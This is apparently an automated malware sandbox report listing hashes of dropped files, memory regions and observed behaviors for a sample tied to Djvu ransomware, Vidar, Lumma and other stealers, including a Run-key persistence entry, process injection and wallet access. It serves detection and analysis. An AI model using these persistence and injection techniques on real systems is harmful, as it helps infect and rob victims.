C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | d67fa48cf6cf5f1818b732ea24db1d6e |
| SHA1 | 44858909775b98c384307149a53b231f084427f6 |
| SHA256 | 1dd5acc0e95a7e0a6eea0ce7e4ab2665c928db84a241f4006a06791343b84d27 |
| SHA512 | c89132c4ac4a3e34e37ba33d98347af7c6a0394eceafb043cfd99e5d41d68575287cc537831a3f42924c975f7716aa0c531c6f619fac2df1c17daca658b926a6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 8202a1cd02e7d69597995cabbe881a12 |
| SHA1 | 8858d9d934b7aa9330ee73de6c476acf19929ff6 |
| SHA256 | 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5 |
| SHA512 | 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | fae824a47e25a52fa87a58ea307183f0 |
| SHA1 | 167aee477372f3a380a69fc2654c64b1f5e0e5e2 |
| SHA256 | aaf7d93821170cf96ce48623dd8525d5698636dd2303f1cb8b07264c444af357 |
| SHA512 | 0989dfa40b02e98470912b189992bfea43a1e6496e03c66944006c93f254f9afc3fa09c4b8555a29d590c00813bd3d9a35dc771a3cb0207bf6a00c2e9aed7345 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 14df8e8d9da174089ed3ab7dcc22165c |
| SHA1 | a83ae80f69a2b631992a3d3951e3fccc98f0af93 |
| SHA256 | 58de7867dc0b8866736ee742b7337d70e06f19d9c8c951b600704af3abab48d4 |
| SHA512 | 8b64e00979a0e71d1432a19cb091360db405bd7fff82c3f3f21bc3471f9983d251758e6bc1735a3bf408bb5d91a015f7b1907a8bd89e939e17fbd50c382117d4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3714cad04dd89864e16db8534df25e4c |
| SHA1 | 37ba08ecf1c02bf4104585ad6f2a7ca2e7f53aed |
| SHA256 | 2cc9d3a1b9cd79413a4b9698faa0d98032fe9a714ffed6888da320aba7a291c6 |
| SHA512 | f41edb81f27cbeb0abae0171d3bcc3335c802bf7bafaeb5477e215e4e0c400821a988746cbbc8501c41b4eb416ffeef32cdf66450b5c9e61eb8fcc44af4c62b7 |
C:\Users\Admin\AppData\Local\Temp\Cab8739.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
memory/1820-82-0x0000000000400000-0x0000000000537000-memory.dmp
memory/1820-83-0x0000000000400000-0x0000000000537000-memory.dmp
memory/1820-87-0x0000000000400000-0x0000000000537000-memory.dmp
memory/1820-89-0x0000000000400000-0x0000000000537000-memory.dmp
memory/1820-90-0x0000000000400000-0x0000000000537000-memory.dmp
\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe
| MD5 | 47704f454af8641dac1af2e2768d7881 |
| SHA1 | e3341bfdec84f69684aecde18cab2864519c7728 |
| SHA256 | a6a9375dd6e3b285bc6d65536a151a47dd136aced8180492f5ed6a391edf0d64 |
| SHA512 | 9aea598ee30342a88fedf5eca2b104e8c5587cd284bd43229581b04497c60e6a71e5392a171a5dfbe88a2e41269434922e21c3f7f9682e2ea10b27b104606b25 |
memory/3016-107-0x0000000000400000-0x0000000000644000-memory.dmp
memory/660-112-0x0000000000230000-0x0000000000261000-memory.dmp
memory/3016-111-0x0000000000400000-0x0000000000644000-memory.dmp
memory/660-110-0x0000000000896000-0x00000000008B2000-memory.dmp
memory/1820-103-0x0000000000400000-0x0000000000537000-memory.dmp
memory/3016-105-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/3016-113-0x0000000000400000-0x0000000000644000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TarA22A.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\Local\Temp\TarA413.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe
| MD5 | 41b883a061c95e9b9cb17d4ca50de770 |
| SHA1 | 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad |
| SHA256 | fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408 |
| SHA512 | cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319 |
memory/1820-181-0x0000000000400000-0x0000000000537000-memory.dmp
memory/3016-183-0x0000000000400000-0x0000000000644000-memory.dmp
memory/2524-186-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2980-188-0x0000000000980000-0x0000000000A80000-memory.dmp
memory/2524-189-0x0000000000400000-0x0000000000406000-memory.dmp
memory/2980-190-0x0000000000220000-0x0000000000224000-memory.dmp
memory/2524-193-0x0000000000400000-0x0000000000406000-memory.dmp
memory/2524-195-0x0000000000400000-0x0000000000406000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\D55B.exe
| MD5 | 9e52aa572f0afc888c098db4c0f687ff |
| SHA1 | ef7c2bb222e69ad0e10c8686eb03dcbee7933c2b |
| SHA256 | 4a40f9d491f09521f4b0c6076a0eb488f6d8e1cf4b67aa6569c2ccce13556443 |
| SHA512 | d0991e682ae8c954721e905753b56c01f91b85313beb9996331793c3efa8acc13d574ef5ba44853ecc3e05822931ed655bad1924fa11b774a43e015f42185f62 |
memory/2868-211-0x0000000000260000-0x0000000000F45000-memory.dmp
memory/2868-216-0x00000000000F0000-0x00000000000F1000-memory.dmp
memory/2868-219-0x00000000000F0000-0x00000000000F1000-memory.dmp
memory/2868-218-0x0000000000260000-0x0000000000F45000-memory.dmp
memory/2868-221-0x00000000000F0000-0x00000000000F1000-memory.dmp
memory/2868-222-0x0000000000100000-0x0000000000101000-memory.dmp
memory/2868-224-0x0000000000100000-0x0000000000101000-memory.dmp
memory/2868-226-0x0000000000100000-0x0000000000101000-memory.dmp
memory/2868-229-0x0000000000110000-0x0000000000111000-memory.dmp
memory/2868-231-0x0000000000110000-0x0000000000111000-memory.dmp
memory/2868-234-0x0000000000120000-0x0000000000121000-memory.dmp
memory/2868-236-0x0000000000120000-0x0000000000121000-memory.dmp
\Users\Admin\AppData\Local\Temp\D55B.exe
| MD5 | d93e4dc19c2cd25d6bfd3fff6f2b27af |
| SHA1 | 3dce53a7800b1e82b9f4f2f6011e94bddd5fc3cb |
| SHA256 | 40ce345534f5f07cd01d1a5612577f53a991d9d7bc76f7c0f44d53b08e59c51d |
| SHA512 | a98024b3a381f11b40030509539211cf4bc8f9ab8ed6a368644e865bcccd8b498f53e6ba74a0db2c3d4b383aba9ddaee93be4efde0e22fa1c4a9c240712a2902 |
\Users\Admin\AppData\Local\Temp\D55B.exe
| MD5 | aa446655b3ddadb20daa89ed5306b3a2 |
| SHA1 | 76b29972397c9e716108c530558326e0b18b38fb |
| SHA256 | 858c1b15c0e9ac57b343cd72bfc3592b3a5716fbc59ced1b3bca3455f1634c4d |
| SHA512 | 45e8be7eed7e8c535e92cebed7e09f1ecda7dc99d09bb22f9d3c600f68f86c6633c64c17920aee7a98813d544a60f4e614e70b054bc6ff1cd788a086f60f04e8 |
\Users\Admin\AppData\Local\Temp\D55B.exe
| MD5 | a4547c6ffa08aecc8b00ac617283e884 |
| SHA1 | 199437df98dac1e64ac59caaa965616e0853a1b6 |
| SHA256 | 2344b653d3577a1c78171c099aaa2505d23fb024d5b5af10c728c2402e02a592 |
| SHA512 | f09244a93ab44a2d7d2873d4815b5ebcc2e0eea7ba566c92b289c8720af7b9c038ef3808d6225cdbeaab8b1d305a6815f6b4fbab294a878d0c59ce02d4cab7e0 |
memory/2868-250-0x0000000000150000-0x0000000000151000-memory.dmp
\Users\Admin\AppData\Local\Temp\F31A.exe
| MD5 | a38d4abfcf2cc15bf220cc32fc21c448 |
| SHA1 | 35b19554c2adb7caed0183e0fdefd1765a421e57 |
| SHA256 | 5d36c7f8436f72c6d9e67b290c65b5d21ae4a5e30ff30143f5ac1742b7fafe05 |
| SHA512 | e578b32168fd153a703ded21197fbefdd8b4357c4c3978edf84738ffa928ad278421fd7ea2feb2a3cebf13261b5a2bffcca95594a34f1fb52d3490138afc36fb |
C:\Users\Admin\AppData\Local\Temp\F31A.exe
| MD5 | 739a567bcbb5d444c31fc45e80c2ffad |
| SHA1 | 353b43fb544edc32af852a3c9ab560ba90ddc05e |
| SHA256 | ee9edc2473cee323a9cb867d196fc53d8049d21e357d316f8cb7a43c02f36993 |
| SHA512 | 2908f1429b596a1fa71fc7b47600cf54212fa622dc82eb019c45cdf638453a968c36b9abf22609303693c6dd03e482758e177dc58211dc1f6c179e00d4eb0f38 |
memory/1032-264-0x00000000009B0000-0x0000000000AB0000-memory.dmp
memory/2980-262-0x0000000000220000-0x0000000000224000-memory.dmp
memory/2868-272-0x0000000000260000-0x0000000000F45000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\3F18.exe
| MD5 | f0c94dddfe48fc59e16292085f2a1dec |
| SHA1 | 53d5fc078a95d82f980ceda525b9e1bfa84cc0a2 |
| SHA256 | 144533d2a305451c2c3c60ecd273f5745c8949d3aa55a26655e7a696528202ba |
| SHA512 | 6b86919e458fd33b9903c5c6c65d52df068cade688d9bb393a432cc14e5b063e87aa2c1e9655bcae4cd312fb1d323da116b75357527fe53a064b487a1d94b20b |
C:\Users\Admin\AppData\Local\Temp\3F18.exe
| MD5 | f7ca612af421d5246bff466f9f646b2c |
| SHA1 | 7ceed481d264879f5f54bc5b048c31d76aa4879a |
| SHA256 | a1e2c4eee561c36d64b88d9f25914e0af39a2265cb69a1b4d572fe38cb5ffcfd |
| SHA512 | e1e529293d4bd96e630edde518d9f1e383983c7b8f4509219363142e2530b1dfd275a6ffccda6a298cd1817d663a7959a1d085fe8fc677d7a22b639dca0286d0 |
memory/1524-281-0x0000000001280000-0x0000000001722000-memory.dmp
memory/1524-282-0x0000000077670000-0x0000000077672000-memory.dmp
memory/1524-285-0x0000000000A50000-0x0000000000A51000-memory.dmp
memory/1524-286-0x0000000000CD0000-0x0000000000CD1000-memory.dmp
memory/1524-284-0x0000000000C50000-0x0000000000C51000-memory.dmp
memory/1524-283-0x0000000000BF0000-0x0000000000BF2000-memory.dmp
memory/1524-288-0x0000000000A00000-0x0000000000A01000-memory.dmp
memory/1524-287-0x0000000000990000-0x0000000000991000-memory.dmp
memory/1524-290-0x0000000000CC0000-0x0000000000CC1000-memory.dmp
memory/1524-289-0x0000000000A60000-0x0000000000A61000-memory.dmp
memory/1524-291-0x0000000000940000-0x0000000000941000-memory.dmp
memory/1524-292-0x00000000009A0000-0x00000000009A1000-memory.dmp
memory/1524-293-0x0000000001280000-0x0000000001722000-memory.dmp
memory/1524-294-0x00000000008D0000-0x00000000008D1000-memory.dmp
memory/1524-296-0x00000000009F0000-0x00000000009F1000-memory.dmp
memory/1524-297-0x0000000000DE0000-0x0000000000DE1000-memory.dmp
memory/1524-298-0x00000000008E0000-0x00000000008E1000-memory.dmp
memory/1524-299-0x0000000001270000-0x0000000001271000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\463A.exe
| MD5 | 0de19cd17462ea79db1a5e5fd1d7f59f |
| SHA1 | d2b313dcfbda9a04475fc01182336b52846bbe3b |
| SHA256 | c7a85c09379538ca0f5e856eb5dcf63d949c9d1841e12cb8c5fd42c780f1fe3b |
| SHA512 | 0aecaaa2d8488c3150b2349c260782c13619c5b871f7559496da8fa53e8a18a3fff39603d65516f53709c95108672fd08da8a1249b58aaba92c19ad80411d40c |
C:\Users\Admin\AppData\Local\Temp\3F18.exe
| MD5 | 22b21bd1bb31df3cb3a23895d72d3cca |
| SHA1 | dd60134aa21c226e52fa6bad9965ec47369e013a |
| SHA256 | 9e7f9056ed055f0163d75e314faaaba40d5e7fd4e02c9b40c150420d5a432f69 |
| SHA512 | 38a4bf25f59c553794a863e6e540a33b921c380459cf8ee4586c21589c7ffbe7ff36d3c6875703d6777a3de43970557928bde90c3f7125eb66eea73cdd24b9d7 |
memory/1524-311-0x0000000001280000-0x0000000001722000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4D8B.exe
| MD5 | f727c0754ddda4ed6354375ab748735b |
| SHA1 | 2ad7d52a12f896817edfe511ec26212580dc5958 |
| SHA256 | 661a2b6049a9d139ab8ae094b25ea0cfd3f24e7aa18190ae11e23f9e97753899 |
| SHA512 | 1193780f969653123b41f41f9f6aeb1b71752d80337fd01928dfcee4e370b49fc24da0bfab6bcfb710019301bea3800db90250b46bfae4a45e2ad6a6d73a5ce3 |
memory/2108-318-0x0000000000830000-0x00000000008CA000-memory.dmp
memory/2108-319-0x0000000072F40000-0x000000007362E000-memory.dmp
memory/340-324-0x0000000000400000-0x00000000004AB000-memory.dmp
memory/340-323-0x0000000000220000-0x000000000028F000-memory.dmp
memory/340-322-0x0000000000910000-0x0000000000A10000-memory.dmp
memory/2108-325-0x0000000009590000-0x00000000095D0000-memory.dmp
memory/2160-333-0x000000006F9B0000-0x000000006FF5B000-memory.dmp
memory/2936-332-0x000000006F9B0000-0x000000006FF5B000-memory.dmp
memory/2160-331-0x000000006F9B0000-0x000000006FF5B000-memory.dmp
memory/2160-334-0x0000000001DE0000-0x0000000001E20000-memory.dmp
memory/2936-335-0x0000000002280000-0x00000000022C0000-memory.dmp
memory/2936-337-0x0000000002280000-0x00000000022C0000-memory.dmp
memory/2936-338-0x000000006F9B0000-0x000000006FF5B000-memory.dmp
memory/340-339-0x00000000008E0000-0x00000000008E1000-memory.dmp
memory/340-353-0x0000000000910000-0x0000000000A10000-memory.dmp
memory/340-354-0x0000000000400000-0x00000000004AB000-memory.dmp
memory/2160-356-0x000000006F9B0000-0x000000006FF5B000-memory.dmp
memory/2936-355-0x000000006F9B0000-0x000000006FF5B000-memory.dmp
memory/1828-360-0x0000000000680000-0x0000000000780000-memory.dmp
memory/1828-361-0x0000000000400000-0x00000000004AB000-memory.dmp
memory/2108-371-0x0000000072F40000-0x000000007362E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\650401615101
| MD5 | 29d3383c235bc3061c5b17767ca03ca7 |
| SHA1 | c67b916e63fb47d59b6e278582a2c7e4c095ebcf |
| SHA256 | 402521c872f6fd098b481ce293ccc5f4efeb2d6357c7e11be5857934e96883cc |
| SHA512 | 3d83969eae3b149011b62469db0da7c2978d03521605d4c3ed5544ad006e87da5c7d295b95258aa82e7b0707457f1e734d9c3f4c4f57705b5762ddcdc3b5ba54 |
C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll
| MD5 | cb253bf8a6859eadd30b4ceb66c6a588 |
| SHA1 | 7e9383d51ec36a019b5884f79a2ac2c05b4049bd |
| SHA256 | 03d2efb0706bab18e7b594b985f20bd316d9e074dc3906ebefe7ab4baffe5722 |
| SHA512 | 1291d53ee1e025889a6d2bb222eac940c4ba73ae22fd956cbc8c9e61fcc0f78c96a5277362750a5e168ab5a02b46d5d11defaca0956eae08ad546ec529a3e061 |
C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll
| MD5 | ea714a90e8e8d71a6071e03019c262f4 |
| SHA1 | 7572c34d6515710b15d6e1db8ec7f1882859107e |
| SHA256 | b27d89c4d824903556d6f31c2168d171b803daae90c01257b0fb76f8448140a3 |
| SHA512 | c6a37c6f932e3e372e0deac92bc33fe5ca61b26ca01d5fe7caf45e4077981bb61cffbf7383fdd850e8fa675de4a8254c42d522b4b25f30094da9bd9d353d7724 |
\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll
| MD5 | 58783e32d609b3420b0caca7d5eb106e |
| SHA1 | 6f091cb1fed8645ea56940c46de14b1c9012faff |
| SHA256 | 6a4b7731cefe60974b947ccd6f0c668962086ed89db1e580f99826dcb7fe5de7 |
| SHA512 | e641220787688756ca56189f50dcfcfa722e4c6177c054963c1f2deb0395b6f191c2cf691d5cae4fa95793cfc81fbe8c08b8c37129945ab5b975092fc4fbcb6c |
\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll
| MD5 | 5d704f986a395b5f2678f61607eac6a9 |
| SHA1 | 6c92032bd4de36ff08cef4f0d3a567fda5e3a240 |
| SHA256 | 3a868d5273802c26f0844c8c92db0e91d70b9d5e8921aa44090a6ce3db2a68ec |
| SHA512 | 2a4979a5e3b5ac1ddbb35438825bb8c345ff939a1916a45076986d8efb9bd08fafde38eb1daa6c1ffea7d64330d9a8a1ed10b62df36a79af3ad2f46ca15963ea |
\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll
| MD5 | 362f796939437d943cb1987096a0e546 |
| SHA1 | 00a9f0be3bf1dffbe8f4afd82493c9012d32c732 |
| SHA256 | 051a1685f8563008ec5be46ff8d02ad3df178d1273d0eb5e8a6692ad36d2da68 |
| SHA512 | f947cc63f53d3ce6e1fdc61ee73bc6b9c040a2845746e17fb8b4d2656f18e16c88155925971348f4241fc64412879196449f66bcca625f26d9801866aa572fd8 |
memory/2108-396-0x0000000009590000-0x00000000095D0000-memory.dmp
memory/308-399-0x0000000010000000-0x0000000010253000-memory.dmp
C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll
| MD5 | 646474805e0a482a64c8fb0fd24cc193 |
| SHA1 | e0f3f06273ece606c9f652b446473dcc90525279 |
| SHA256 | a35b75ae6391b97d77245a8f880ea94d31491c82b6856752a1351f58bcc965bd |
| SHA512 | b0fb54455c5e9d20f61d9aef49969d9fb84fe89fde53ea42b4b01f4822a61308018a054c16277da6b8d91b3219c55deeaf8f568ac5a7b049e3aa2b6f64d53fb0 |
C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll
| MD5 | fe17a11e16a4d19d2eeb2a5ec43f0af4 |
| SHA1 | de72611f201f3db4aa0d89bffab5b63bdc7a1895 |
| SHA256 | 14a3e2ff433e197099978da1ac9b1cab0a6dd99a0dadde38a6696614ce349107 |
| SHA512 | 1a6cc018e223ca0896f3d72023c1f6907d3e103f2fafb23c08d5c0a4a551d5e95cb11468482eba9dcfddc8bfc073316b7854faf6cca3af17069cb007ba5d2903 |
\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll
| MD5 | 4876ee75ce2712147c41ff1277cd2d30 |
| SHA1 | 3733dc92318f0c6b92cb201e49151686281acda6 |
| SHA256 | bbfba2d40f48c16a53b5806555c08aff1982c3fe4a77964963edbab9d7e672ed |
| SHA512 | 9bf25d4d0dfebd287b0c84abb64612b3db00a26b0217490b35925e77487d6c872632c936cedf1205c46ecbf9d4dfc9bc7600bee05afc550b30ae0d0964c5afe9 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F40GDP7G8DKU5CA6L297.temp
| MD5 | 15c5b56061b272e6034676f253ad2173 |
| SHA1 | 035ae77b6861ed7867d0a4ffcb7ce9ceb9779fca |
| SHA256 | 4477b5a2da2a2ab427a595009af7276d888072a6cdbb9a4e3870e3ba3172131d |
| SHA512 | d6bbb09f0d3a2815852116126163c3ec9eabcef4aaa634a7400ac3857a39596cf818f0217f85519971643350ff488aa0e5fb3ad64aadda5202e50e9ecc758ef0 |
memory/1828-419-0x0000000000680000-0x0000000000780000-memory.dmp
memory/1828-424-0x0000000000400000-0x00000000004AB000-memory.dmp
memory/2852-425-0x000000001B380000-0x000000001B662000-memory.dmp
C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll
| MD5 | ca684dc5ebed4381701a39f1cc3a0fb2 |
| SHA1 | 8c4a375aa583bd1c705597a7f45fd18934276770 |
| SHA256 | b8c5ad09c5b62fa8d8bcb8e1c317700274b4756d04fc964ccae38103c318ddd2 |
| SHA512 | 8b414799e37d50f664e04e704ab06a8f6f25cb9f9c24f157e998a72aad9c0a0cd9435b42c629dc26643f039725d22a89ca3468dc39009d11d910420a80e9c510 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-15 01:10
Reported
2024-03-15 01:15
Platform
win10-20240221-en
Max time kernel
300s
Max time network
299s
Command Line
Signatures
DcRat
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ab53deb9-ed78-4480-8153-4fc7e31f7c86\\1384.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\1384.exe | N/A |
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Lumma Stealer
SmokeLoader
Stealc
Vidar
ZGRat
Downloads MZ/PE file
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1384.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1384.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2335.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1384.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1384.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9CDA.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\B352.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\343B.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\343B.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ab53deb9-ed78-4480-8153-4fc7e31f7c86\\1384.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\1384.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2936 set thread context of 428 | N/A | C:\Users\Admin\AppData\Local\Temp\1384.exe | C:\Users\Admin\AppData\Local\Temp\1384.exe |
| PID 1400 set thread context of 4064 | N/A | C:\Users\Admin\AppData\Local\Temp\2335.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4652 set thread context of 608 | N/A | C:\Users\Admin\AppData\Local\Temp\1384.exe | C:\Users\Admin\AppData\Local\Temp\1384.exe |
| PID 1232 set thread context of 2232 | N/A | C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe | C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe |
| PID 4204 set thread context of 4796 | N/A | C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build3.exe | C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build3.exe |
| PID 3376 set thread context of 1660 | N/A | C:\Users\Admin\AppData\Local\Temp\343B.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
